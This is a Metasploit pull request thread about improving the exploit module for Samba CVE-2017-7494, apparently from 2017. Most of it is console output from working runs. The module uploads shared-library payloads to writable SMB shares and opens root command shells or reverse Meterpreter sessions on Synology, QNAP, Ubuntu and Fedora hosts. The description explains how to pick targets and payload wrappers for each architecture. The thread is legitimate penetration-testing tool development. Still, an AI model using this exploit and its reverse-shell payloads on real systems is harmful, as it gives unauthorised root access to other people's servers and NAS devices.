### PR TITLE
Samba CVE-2017-7494 Improvements

### PR DESCRIPTION
**Pull request by hdm**
This PR includes some cleanup work around the SMB mixin, the SMB SimpleClient disconnect method, and the smb_enumshares module, but the primary goal is to make the Samba CVE-2017-7494 module much better.

Notable changes: 
 * The server-side path is automatically determined from the NetShareGetInfo reply
 * The module now works against both Samba 3.x and Samba 4.x 
 * The payload wrappers now return root on all tested systems
 * The default target now reuses the Samba socket and works across these architectures:
   * ARCH_X86
   * ARCH_X86_64
   * ARCH_X64
   * ARCH_MIPS
   * ARCH_MIPSLE
   * ARCH_MIPSBE
   * ARCH_MIPS64
   * ARCH_PPC
   * ARCH_PPC64
   * ARCH_PPC64LE
   * ARCH_SPARC
   * ARCH_ARMLE
   * ARCH_AARCH64
 * The payload wrappers now come in three flavors (per ARCH):
   * shellcode: execute an arbitrary blob in a forked subprocess
   * system: execute an arbitrary system command in a forked subprocess
   * findsock: start a remote shell on the active SMB socket

The mechanics of all of this mean:
* The default target of 0 uses cmd/unix/interact with the findsock wrapper to magically grant you an interactive root shell regardless of architecture (it might take a few seconds to find it though)
* Target 1 uses the system wrapper, which lets you use any unix platform "CMD" payload with this exploit, also regardless of architecture, it will figure it out and mostly just work.
* Targets 2+ are specific to each architecture and work in the normal sense (select x86_64, choose the correctly meterpreter payload, etc). These use the shellcode wrapper.

The default interact target is special in that it will work for any system with a valid binary in the templates directory. Currently this means we can also shell  mips64el, sparc64, and s390x systems, even though Metasploit doesn't have payload support (or Rex::Arch definitions) for these. 

Updating this module to handle the BSD and other Unix variants should be cake as well.

Hopefully this means that just about any supported Linux platform will drop a root shell without much work. Standard mitigations like selinux/gradm still matter, but otherwise this should be pain-free.

Quick examples:

Rooting a Synology three ways:

1) Using the default target
```
msf exploit(is_known_pipename) > exploit 

[*] 192.168.0.41:445 - Using location \\192.168.0.41\Temp\ for the path
[*] 192.168.0.41:445 - Retrieving the remote path of the share 'Temp'
[*] 192.168.0.41:445 - Share 'Temp' has server-side path '/volume1/Temp
[*] 192.168.0.41:445 - Uploaded payload to \\192.168.0.41\Temp\AVNOOBrN.so
[*] 192.168.0.41:445 - Loading the payload from server-side path /volume1/Temp/AVNOOBrN.so using \\PIPE\/volume1/Temp/AVNOOBrN.so...
[-] 192.168.0.41:445 -   >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] 192.168.0.41:445 - Loading the payload from server-side path /volume1/Temp/AVNOOBrN.so using /volume1/Temp/AVNOOBrN.so...
[+] 192.168.0.41:445 - Probe response indicates the interactive payload was loaded...
[*] Found shell.
[*] Command shell session 21 opened (192.168.0.3:36390 -> 192.168.0.41:445) at 2017-05-27 17:12:53 -0500

id
uid=0(root) gid=0(root) groups=0(root)

uname -a
Linux NAS2 3.10.102 #15047 SMP Thu Feb 23 02:23:21 CST 2017 x86_64 GNU/Linux synology_avoton_2415+
```

2) Using the system wrapper target with a CMD payload (messy but fast)
```
msf exploit(is_known_pipename) > set TARGET 1
msf exploit(is_known_pipename) > set PAYLOAD cmd/unix/reverse_openssl 
msf exploit(is_known_pipename) > exploit 

[*] Started reverse double SSL handler on 192.168.0.3:4444 
[*] 192.168.0.41:445 - Using location \\192.168.0.41\Temp\ for the path
[*] 192.168.0.41:445 - Retrieving the remote path of the share 'Temp'
[*] 192.168.0.41:445 - Share 'Temp' has server-side path '/volume1/Temp
[*] 192.168.0.41:445 - Uploaded payload to \\192.168.0.41\Temp\pGUBPIKw.so
[*] 192.168.0.41:445 - Loading the payload from server-side path /volume1/Temp/pGUBPIKw.so using \\PIPE\/volume1/Temp/pGUBPIKw.so...
[-] 192.168.0.41:445 -   >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] 192.168.0.41:445 - Loading the payload from server-side path /volume1/Temp/pGUBPIKw.so using /volume1/Temp/pGUBPIKw.so...
[-] 192.168.0.41:445 -   >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] 192.168.0.41:445 - Uploaded payload to \\192.168.0.41\Temp\ozNBcHQy.so
[*] 192.168.0.41:445 - Loading the payload from server-side path /volume1/Temp/ozNBcHQy.so using \\PIPE\/volume1/Temp/ozNBcHQy.so...
[-] 192.168.0.41:445 -   >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] 192.168.0.41:445 - Loading the payload from server-side path /volume1/Temp/ozNBcHQy.so using /volume1/Temp/ozNBcHQy.so...
[-] 192.168.0.41:445 -   >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] Command: echo yYBqYirEP7608f22;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] 192.168.0.41:445 - Uploaded payload to \\192.168.0.41\Temp\zpNkywCE.so
[*] 192.168.0.41:445 - Loading the payload from server-side path /volume1/Temp/zpNkywCE.so using \\PIPE\/volume1/Temp/zpNkywCE.so...
[-] 192.168.0.41:445 -   >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] 192.168.0.41:445 - Loading the payload from server-side path /volume1/Temp/zpNkywCE.so using /volume1/Temp/zpNkywCE.so...
[-] 192.168.0.41:445 -   >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] 192.168.0.41:445 - Uploaded payload to \\192.168.0.41\Temp\sFdZljtZ.so
[*] 192.168.0.41:445 - Loading the payload from server-side path /volume1/Temp/sFdZljtZ.so using \\PIPE\/volume1/Temp/sFdZljtZ.so...
[-] 192.168.0.41:445 -   >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] 192.168.0.41:445 - Loading the payload from server-side path /volume1/Temp/sFdZljtZ.so using /volume1/Temp/sFdZljtZ.so...
[*] Reading from socket B
[*] B: "yYBqYirEP7608f22\n"
[*] Matching...
[*] A is input...
[-] 192.168.0.41:445 -   >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] Command shell session 22 opened (192.168.0.3:4444 -> 192.168.0.41:41160) at 2017-05-27 17:14:01 -0500
[*] 192.168.0.41:445 - Uploaded payload to \\192.168.0.41\Temp\dzxJOznD.so
[*] 192.168.0.41:445 - Loading the payload from server-side path /volume1/Temp/dzxJOznD.so using \\PIPE\/volume1/Temp/dzxJOznD.so...
[-] 192.168.0.41:445 -   >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] 192.168.0.41:445 - Loading the payload from server-side path /volume1/Temp/dzxJOznD.so using /volume1/Temp/dzxJOznD.so...
[-] 192.168.0.41:445 -   >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] 192.168.0.41:445 - Uploaded payload to \\192.168.0.41\Temp\PdlndFgQ.so
[*] 192.168.0.41:445 - Loading the payload from server-side path /volume1/Temp/PdlndFgQ.so using \\PIPE\/volume1/Temp/PdlndFgQ.so...
[-] 192.168.0.41:445 -   >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] 192.168.0.41:445 - Loading the payload from server-side path /volume1/Temp/PdlndFgQ.so using /volume1/Temp/PdlndFgQ.so...
[-] 192.168.0.41:445 -   >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] 192.168.0.41:445 - Uploaded payload to \\192.168.0.41\Temp\dIUFNfVX.so
[*] 192.168.0.41:445 - Loading the payload from server-side path /volume1/Temp/dIUFNfVX.so using \\PIPE\/volume1/Temp/dIUFNfVX.so...
[-] 192.168.0.41:445 -   >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] 192.168.0.41:445 - Loading the payload from server-side path /volume1/Temp/dIUFNfVX.so using /volume1/Temp/dIUFNfVX.so...
[-] 192.168.0.41:445 -   >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] 192.168.0.41:445 - Uploaded payload to \\192.168.0.41\Temp\QkncaEQu.so
[*] 192.168.0.41:445 - Loading the payload from server-side path /volume1/Temp/QkncaEQu.so using \\PIPE\/volume1/Temp/QkncaEQu.so...
[-] 192.168.0.41:445 -   >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] 192.168.0.41:445 - Loading the payload from server-side path /volume1/Temp/QkncaEQu.so using /volume1/Temp/QkncaEQu.so...
[-] 192.168.0.41:445 -   >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] 192.168.0.41:445 - Uploaded payload to \\192.168.0.41\Temp\qUKtSBta.so
[*] 192.168.0.41:445 - Loading the payload from server-side path /volume1/Temp/qUKtSBta.so using \\PIPE\/volume1/Temp/qUKtSBta.so...
i[-] 192.168.0.41:445 -   >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] 192.168.0.41:445 - Loading the payload from server-side path /volume1/Temp/qUKtSBta.so using /volume1/Temp/qUKtSBta.so...
[-] 192.168.0.41:445 -   >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
d
[*] 192.168.0.41:445 - Uploaded payload to \\192.168.0.41\Temp\fLghulfZ.so
[*] 192.168.0.41:445 - Loading the payload from server-side path /volume1/Temp/fLghulfZ.so using \\PIPE\/volume1/Temp/fLghulfZ.so...
[-] 192.168.0.41:445 -   >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] 192.168.0.41:445 - Loading the payload from server-side path /volume1/Temp/fLghulfZ.so using /volume1/Temp/fLghulfZ.so...
[-] 192.168.0.41:445 -   >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] 192.168.0.41:445 - Uploaded payload to \\192.168.0.41\Temp\sbJeKCwM.so
[*] 192.168.0.41:445 - Loading the payload from server-side path /volume1/Temp/sbJeKCwM.so using \\PIPE\/volume1/Temp/sbJeKCwM.so...
[-] 192.168.0.41:445 -   >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] 192.168.0.41:445 - Loading the payload from server-side path /volume1/Temp/sbJeKCwM.so using /volume1/Temp/sbJeKCwM.so...
[-] 192.168.0.41:445 -   >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] 192.168.0.41:445 - Uploaded payload to \\192.168.0.41\Temp\NSIPQwsX.so
[*] 192.168.0.41:445 - Loading the payload from server-side path /volume1/Temp/NSIPQwsX.so using \\PIPE\/volume1/Temp/NSIPQwsX.so...
[-] 192.168.0.41:445 -   >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] 192.168.0.41:445 - Loading the payload from server-side path /volume1/Temp/NSIPQwsX.so using /volume1/Temp/NSIPQwsX.so...
[-] 192.168.0.41:445 -   >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND

uid=0(root) gid=0(root) groups=0(root)
```

3) Using the Linux x86_64 target with Meterpreter
```
msf exploit(is_known_pipename) > set TARGET 3
msf exploit(is_known_pipename) > set PAYLOAD linux/x64/meterpreter/reverse_tcp 
msf exploit(is_known_pipename) > exploit 

[*] Started reverse TCP handler on 192.168.0.3:4444 
[*] 192.168.0.41:445 - Using location \\192.168.0.41\Temp\ for the path
[*] 192.168.0.41:445 - Retrieving the remote path of the share 'Temp'
[*] 192.168.0.41:445 - Share 'Temp' has server-side path '/volume1/Temp
[*] 192.168.0.41:445 - Uploaded payload to \\192.168.0.41\Temp\vqeTGCdi.so
[*] 192.168.0.41:445 - Loading the payload from server-side path /volume1/Temp/vqeTGCdi.so using \\PIPE\/volume1/Temp/vqeTGCdi.so...
[-] 192.168.0.41:445 -   >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] 192.168.0.41:445 - Loading the payload from server-side path /volume1/Temp/vqeTGCdi.so using /volume1/Temp/vqeTGCdi.so...
[-] 192.168.0.41:445 -   >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] Sending stage (2849784 bytes) to 192.168.0.41
[*] Meterpreter session 23 opened (192.168.0.3:4444 -> 192.168.0.41:41162) at 2017-05-27 17:15:22 -0500

meterpreter > sysinfo
Computer     : 192.168.0.41
OS           :  (Linux 3.10.102)
Architecture : x64
Meterpreter  : x64/linux
```

### CODE REVIEW

**Comment by hdm** [comment]
Oddly enough, Ubuntu now coughs up a plain old root shell now, instead of the nobody shell. 🤷‍♂️

**Comment by h00die** [comment]
Worked for me, fedora still gave `nobody`, much cleaner output too.
Samba 4.4.13
```
msf exploit(is_known_pipename) > exploit

[*] Started reverse TCP handler on 1.2.3.117:4444 
[*] 1.2.3.237:445 - Using location \\1.2.3.237\exploitable\ for the path
[*] 1.2.3.237:445 - Uploaded payload to \\1.2.3.237\exploitable\qQFHNEYT.so
[*] 1.2.3.237:445 - Retrieving the remote path of the share 'exploitable'
[*] 1.2.3.237:445 - Loading the payload from server-side path /tmp/qQFHNEYT.so...
[-] 1.2.3.237:445 - Probe: \\PIPE\/tmp/qQFHNEYT.so: The server responded with error: STATUS_OBJECT_NAME_NOT_FOUND (Command=162 WordCount=0)
[*] Command shell session 1 opened (1.2.3.117:4444 -> 1.2.3.237:54150) at 2017-05-26 18:45:18 -0400

id
uid=99(nobody) gid=0(root) groups=0(root),99(nobody) context=system_u:system_r:smbd_t:s0
cat /etc/*release
Fedora release 24 (Twenty Four)
NAME=Fedora
VERSION="24 (Workstation Edition)"
ID=fedora
VERSION_ID=24
PRETTY_NAME="Fedora 24 (Workstation Edition)"
ANSI_COLOR="0;34"
CPE_NAME="cpe:/o:fedoraproject:fedora:24"
HOME_URL="https://fedoraproject.org/"
BUG_REPORT_URL="https://bugzilla.redhat.com/"
REDHAT_BUGZILLA_PRODUCT="Fedora"
REDHAT_BUGZILLA_PRODUCT_VERSION=24
REDHAT_SUPPORT_PRODUCT="Fedora"
REDHAT_SUPPORT_PRODUCT_VERSION=24
PRIVACY_POLICY_URL=https://fedoraproject.org/wiki/Legal:PrivacyPolicy
VARIANT="Workstation Edition"
VARIANT_ID=workstation
Fedora release 24 (Twenty Four)
Fedora release 24 (Twenty Four)
uname -a
Linux localhost.localdomain 4.5.7-300.fc24.x86_64 #1 SMP Wed Jun 8 18:12:45 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
```

**Comment by kevien** [comment]
what's wrong?
[-] 192.168.247.133:445 - Exploit failed: NameError undefined local variable or method `smb_netshareenumall' for #<Msf::Modules::Mod6578706c6f69742f6c696e75782f73616d62612f69735f6b6e6f776e5f706970656e616d65::MetasploitModule:0x007fbabdd96938>
Did you mean?  smb_enumprinters

**Comment by h00die** [comment]
@kevien my assumption is you only did the new is_known_pipename.rb and not the entire PR since thats a new function that was added in this PR.  However, this isn't a support (issues) this is a PR where the code is being evaluated.  Thank you for posting a potential bug, but make sure you are testing correctly by checking out the git PR for it and not just copying a file.

**Comment by busterb** [comment]
Neat! I'm going to posit that nobody runs Linux on sparc 32-bit, but I'm going to assume this running userspace processes. It'd be nice if you named your payloads with a -linux suffix, since I think there's a good chance of getting this to run on Solaris and FreeBSD too.

**Comment by bcoles** [comment]
Works as described with `DefaultTarget => 0` on QNAP NAS. Gets r00t.

`Linux --- 3.2.26 #2 SMP Tue May 16 06:17:55 CST 2017 armv7l unknown`

For what it's worth:

QNAP NAS has a default guest-writable share `Public` (It was enabled by default 8+ years ago - this might have changed).

It also used to have an optional guest-writable `Network Recycle Bin 1` share for deleted files, however this was changed a few years ago. Now, if the Network Recycle Bin feature is enabled, deleted files are moved to a `@Recycle` sub-directory in the root of the share.

Output:

```
msf exploit(is_known_pipename) > check

[*] 192.168.69.69:445 - Samba version identified as 4.4.9
[-] 192.168.69.69:445 - Enum Qmultimedia: The server responded with error: STATUS_ACCESS_DENIED (Command=117 WordCount=0)
[+] 192.168.69.69:445 - Samba version 4.4.9 found with writeable share 'Public'
[*] 192.168.69.69:445 The target appears to be vulnerable.
msf exploit(is_known_pipename) > run

[-] 192.168.69.69:445 - Enum Qmultimedia: The server responded with error: STATUS_ACCESS_DENIED (Command=117 WordCount=0)
[*] 192.168.69.69:445 - Using location \\192.168.69.69\Public\ for the path
[*] 192.168.69.69:445 - Retrieving the remote path of the share 'Public'
[*] 192.168.69.69:445 - Share 'Public' has server-side path '/share/MD0_DATA/Public
[*] 192.168.69.69:445 - Using payload wrapper 'samba-root-findsock-x86_64'...
[*] 192.168.69.69:445 - Uploaded payload to \\192.168.69.69\Public\RWRRdrju.so
[*] 192.168.69.69:445 - Loading the payload from server-side path /share/MD0_DATA/Public/RWRRdrju.so using \\PIPE\/share/MD0_DATA/Public/RWRRdrju.so...
[-] 192.168.69.69:445 -   >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] 192.168.69.69:445 - Loading the payload from server-side path /share/MD0_DATA/Public/RWRRdrju.so using /share/MD0_DATA/Public/RWRRdrju.so...
[-] 192.168.69.69:445 -   >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] 192.168.69.69:445 - Using payload wrapper 'samba-root-findsock-x86'...
[*] 192.168.69.69:445 - Uploaded payload to \\192.168.69.69\Public\olyECaGe.so
[*] 192.168.69.69:445 - Loading the payload from server-side path /share/MD0_DATA/Public/olyECaGe.so using \\PIPE\/share/MD0_DATA/Public/olyECaGe.so...
[-] 192.168.69.69:445 -   >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] 192.168.69.69:445 - Loading the payload from server-side path /share/MD0_DATA/Public/olyECaGe.so using /share/MD0_DATA/Public/olyECaGe.so...
[-] 192.168.69.69:445 -   >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] 192.168.69.69:445 - Using payload wrapper 'samba-root-findsock-armel'...
[*] 192.168.69.69:445 - Uploaded payload to \\192.168.69.69\Public\EUkegMHk.so
[*] 192.168.69.69:445 - Loading the payload from server-side path /share/MD0_DATA/Public/EUkegMHk.so using \\PIPE\/share/MD0_DATA/Public/EUkegMHk.so...
[-] 192.168.69.69:445 -   >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] 192.168.69.69:445 - Loading the payload from server-side path /share/MD0_DATA/Public/EUkegMHk.so using /share/MD0_DATA/Public/EUkegMHk.so...
[+] 192.168.69.69:445 - Probe response indicates the interactive payload was loaded...
[*] Found shell.
[*] Command shell session 1 opened (172.16.191.181:40718 -> 192.168.69.69:445) at 2017-05-27 18:41:06 -0400

id
uid=0(admin) gid=0(administrators)
```

**Comment by h00die** [comment]
@busterb it's also in the Linux metasploit path so it would need to be moved if it's working on osx and sun

**Comment by busterb** [comment]
agree, we should probably move to multi. let me poke a bit.

File: data/exploits/CVE-2017-7494/samba-root-shellcode.c [hunk 1]
```diff
@@ -0,0 +1,35 @@
...
...,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0};
```
Comment (busterb) [inline data/exploits/CVE-2017-7494/samba-root-shellcode.c]: you don't need 10k 0's here, only one after the 'PAYLOAD'. The compiler will finish initializing the rest of the array with the last item you specified in the array.

**Comment by hdm** [comment]
Thanks @busterb! Those suggestions have been made. Multi would be nice, pretty sure this doesn't impact Mac OS X, but it should apply to *BSD, and possibly other Unixes.

File: modules/exploits/linux/samba/is_known_pipename.rb [hunk 2]
```diff
@@ -109,15 +135,14 @@ def enumerate_directories(share)
...
 
     ensure
-      if self.simple.shares["\\\\#{rhost}\\#{share}"]
-        self.simple.disconnect("\\\\#{rhost}\\#{share}")
-      end
+      simple.disconnect("\\\\#{rhost}\\#{share}")
     end
   end
 
+  # Detemrine whether a directory in a share is writeable
```
Comment (timwr) [inline modules/exploits/linux/samba/is_known_pipename.rb]: Determine

File: lib/msf/core/exploit/smb/client.rb [hunk 3]
```diff
@@ -638,6 +638,201 @@ def smb_fingerprint_windows_lang
...
+        res.slice!(0,12) # level, CTR header, Reference ID of CTR
+        share_count = res.slice!(0, 4).unpack("V")[0]
+        res.slice!(0,4) # Reference ID of CTR1
+        share_max_count = res.slice!(0, 4).unpack("V")[0]
+
+        if share_max_count != share_count
+          raise RuntimeError, "Invalid DCERPC response: count != count max (#{share_count}/#{share_max_count})"
+        end
+
+        # RerenceID / Type / ReferenceID of Comment
```
Comment (wvu-r7) [inline lib/msf/core/exploit/smb/client.rb]: Think this should be `ReferenceID`.

File: modules/exploits/linux/samba/is_known_pipename.rb [hunk 4]
```diff
@@ -39,58 +38,85 @@ def initialize(info = {})
...
+        ARCH_AARCH64 => [ 'aarch64' ],
+        #
+        # Missing from Rex::Arch
+        #   ARCH_MIPS64LE = 'mips64el',
+        #   ARCH_SPARC64  = 'sparc64',
+        #   ARCH_S390X    = 's390x',
+        #
+    }
+
+    # Architectures we don't offiically support but can shell anyways with interact
```
Comment (wvu-r7) [inline modules/exploits/linux/samba/is_known_pipename.rb]: Should be `officially`. Hat tip @hwilson-r7.

**Comment by hdm** [comment]
Odd build failure:
```ERROR: Service 'ms' failed to build: Get https://registry-1.docker.io/v2/library/ruby/manifests/2.4.1-alpine: Get https://auth.docker.io/token?scope=repository%3Alibrary%2Fruby%3Apull&service=registry.docker.io: EOF```

**Comment by FireFart** [comment]
@hdm build failure can be ignored. We added a task to build the docker image to see if there were breaking changes. Looks like travis could not reach docker hub to download the images.

File: modules/exploits/linux/samba/is_known_pipename.rb [hunk 5]
```diff
@@ -39,58 +38,85 @@ def initialize(info = {})
...
+        ARCH_PPC64   => [ 'powerpc64' ],
+        ARCH_PPC64LE => [ 'powerpc64le' ],
+        ARCH_SPARC   => [ 'sparc' ],
+        ARCH_ARMLE   => [ 'armel', 'armhf' ],
+        ARCH_AARCH64 => [ 'aarch64' ],
+        #
+        # Missing from Rex::Arch
+        #   ARCH_MIPS64LE = 'mips64el',
+        #   ARCH_SPARC64  = 'sparc64',
+        #   ARCH_S390X    = 's390x',
```
Comment (busterb) [inline modules/exploits/linux/samba/is_known_pipename.rb]: S390x is called ARCH_ZARCH

**Comment by wvu-r7** [comment]
```
msf exploit(is_known_pipename) > run

[*] 192.168.33.191:445 - Using location \\192.168.33.191\[redacted]\ for the path
[*] 192.168.33.191:445 - Retrieving the remote path of the share '[redacted]'
[*] 192.168.33.191:445 - Share '[redacted]' has server-side path '/home/[redacted]
[*] 192.168.33.191:445 - Uploaded payload to \\192.168.33.191\[redacted]\LtRCxDpi.so
[*] 192.168.33.191:445 - Loading the payload from server-side path /home/[redacted]/LtRCxDpi.so using \\PIPE\/home/[redacted]/LtRCxDpi.so...
[-] 192.168.33.191:445 -   >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] 192.168.33.191:445 - Loading the payload from server-side path /home/[redacted]/LtRCxDpi.so using /home/[redacted]/LtRCxDpi.so...
[+] 192.168.33.191:445 - Probe response indicates the interactive payload was loaded...
[*] Found shell.
[*] Command shell session 1 opened (192.168.33.1:61749 -> 192.168.33.191:445) at 2017-05-29 16:20:10 -0500

id
uid=0(root) gid=0(root) groups=0(root)
uname -a
Linux ubuntu 3.19.0-59-generic #66-Ubuntu SMP Thu May 12 22:35:27 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
```

```
msf exploit(is_known_pipename) > run

[*] Started reverse TCP handler on 192.168.33.1:4444 
[*] 192.168.33.191:445 - Using location \\192.168.33.191\[redacted]\ for the path
[*] 192.168.33.191:445 - Retrieving the remote path of the share '[redacted]'
[*] 192.168.33.191:445 - Share '[redacted]' has server-side path '/home/[redacted]
[*] 192.168.33.191:445 - Uploaded payload to \\192.168.33.191\[redacted]\FcxyshLn.so
[*] 192.168.33.191:445 - Loading the payload from server-side path /home/[redacted]/FcxyshLn.so using \\PIPE\/home/[redacted]/FcxyshLn.so...
[-] 192.168.33.191:445 -   >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] 192.168.33.191:445 - Loading the payload from server-side path /home/[redacted]/FcxyshLn.so using /home/[redacted]/FcxyshLn.so...
[-] 192.168.33.191:445 -   >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] Sending stage (2849784 bytes) to 192.168.33.191
[*] Meterpreter session 2 opened (192.168.33.1:4444 -> 192.168.33.191:48719) at 2017-05-29 16:21:36 -0500

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : 192.168.33.191
OS           : Ubuntu 15.04 (Linux 3.19.0-59-generic)
Architecture : x64
Meterpreter  : x64/linux
meterpreter > 
```

File: modules/exploits/linux/samba/is_known_pipename.rb (hunk 5 above)
Comment (busterb) [inline modules/exploits/linux/samba/is_known_pipename.rb]: Added the missing architectures here: https://github.com/rapid7/rex-arch/pull/3

Will land and update this PR to match.

**Comment by busterb** [comment]
Added e31e3fc545 for extra target architectures. Will push additional OS support in another PR (was poking at FreeBSD)

**Comment by busterb** [comment]
## Release Notes

This improves the CVE-2017-7494 module by adding automatic server-side path detection, adding support Samba 3.x and 4.x, automatically gains root access where possible, and adds support for 15 different Linux CPU architectures, as well as 3 different ways to execute payloads.

**Pull request merged**